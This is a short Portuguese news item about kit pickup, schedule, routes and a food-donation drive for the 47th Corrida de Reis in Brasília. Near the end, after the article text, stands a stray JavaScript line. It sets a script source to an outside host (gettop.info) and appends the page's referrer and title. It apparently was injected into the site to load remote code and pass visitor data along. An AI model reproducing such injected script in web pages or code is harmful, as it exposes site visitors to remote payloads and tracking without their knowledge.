Retirada de kits para a Corrida de Reis começa amanhã

A retirada de kits para a 47ª Corrida de Reis poderá ser feita a partir desta quarta-feira (15), das 10h às 20h, na Ala Sul do Centro de Convenções Ulysses Guimarães. Os 16 mil inscritos receberão camiseta, número de identificação, chip eletrônico – que cronometra o tempo e a colocação – e instruções da competição. Os itens serão entregues até a sexta-feira (17). 

No sábado (18), antes do início da prova, será passado aos atletas kit com frutas, barras de cereais e água. É necessário apresentar documento de identidade. A largada está marcada para as 19h, entre o Estádio Nacional de Brasília Mané Garrincha e o Centro de Convenções, com percursos populares de 6 e 10 quilômetros e provas adaptadas para pessoas com deficiência, divididas entre cadeirantes e andantes (outras deficiências).

Doação de alimentos 

As doações de 1 quilo de mantimentos não perecíveis, esperadas dos participantes, serão bem-vindas. A arrecadação será repassada ao banco de alimentos da Centrais de Abastecimento do Distrito Federal (Ceasa-DF).

No ano passado, 40 toneladas de gêneros foram arrecadadas e entregues pela Ceasa a entidades assistenciais previamente cadastradas. Mais de 43 mil pessoas foram beneficiadas com as doações.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário